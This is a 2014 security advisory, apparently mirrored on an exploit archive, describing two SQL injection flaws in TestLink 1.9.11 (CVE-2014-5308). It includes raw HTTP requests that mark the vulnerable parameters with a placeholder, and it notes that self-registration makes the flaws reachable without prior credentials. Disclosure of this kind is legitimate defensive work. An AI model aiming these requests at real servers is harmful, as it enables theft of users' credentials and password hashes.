Skip to content
cyberexploits
webappphptext

TestLink 1.9.11 - Multiple SQL Injections

TestLink 1.9.11 - Multiple SQL Injections

Publié le 2014-10-02

Code source

Épinglé au commit 7eac4c3a2ce5
textplatforms/php/webapps/34863.txt7eac4c3a
raw
Vulnerability title: Multiple SQL Injection Vulnerabilities in TestLink

CVE: CVE-2014-5308

Vendor: Testlink

Product: TestLink

Affected version: 1.9.11

Fixed version: Fixed in SVN commit number 7a09973

Reported by: Jerzy Kramarz



Details:



Two SQL injection vulnerabilities have been found and confirmed within the software as an authenticated user. A successful attack could allow an authenticated attacker to access information such as usernames and password hashes that are stored in the database. The following URLs and parameters have been confirmed to suffer from Multiple SQL injections:



Vulnerability 1 (Fixed in commit #7a09973 in official repository)



<pre>



POST /testlink/lib/project/projectView.php?doAction=search HTTP/1.1

Host: 192.168.56.101

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

DNT: 1

Referer: http://192.168.56.101/testlink/lib/project/projectEdit.php

Cookie: [...]

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 200



CSRFName=CSRFGuard_1740781925&CSRFToken=b16[...]&name=<SQL Injection>&search=Search%2FFilter



</pre>



Vulnerability 2 (Fixed in patches after commit #7a09973 in official repository)



<pre>



POST /testlink/lib/events/eventinfo.php HTTP/1.1

Content-Length: 6

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip,deflate

Host: 192.168.56.101

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0

DNT: 1

Connection: close

Referer: http://192.168.56.101/testlink/lib/events/eventviewer.php

Pragma: no-cache

Cache-Control: no-cache

X-Requested-With: XMLHttpRequest

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Cookie: [...] ys-edit_tc_tproject_id_1_ext-comp-1001=a%3As%253A/1; ys-tl_table_eventviewer={"columns":[{"id":1,"width":217,"hidden":true,"sortable":true}],"sort":{"field":"id_th_timestamp","direction":"DESC"},"group":"id_th_loglevel","filters":{}}



id=123<SQL Injection>



</pre>



Note:'Any user can create account for the application in 'testlink/firstLogin.php' page hence its possible to exploit aforementioned SQL injections without prior knowledge of the authentication details.'



Further details at:



https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-5308/





Copyright:

Copyright (c) Portcullis Computer Security Limited 2014, All rights reserved worldwide. Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.



Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.
Voir sur GitHub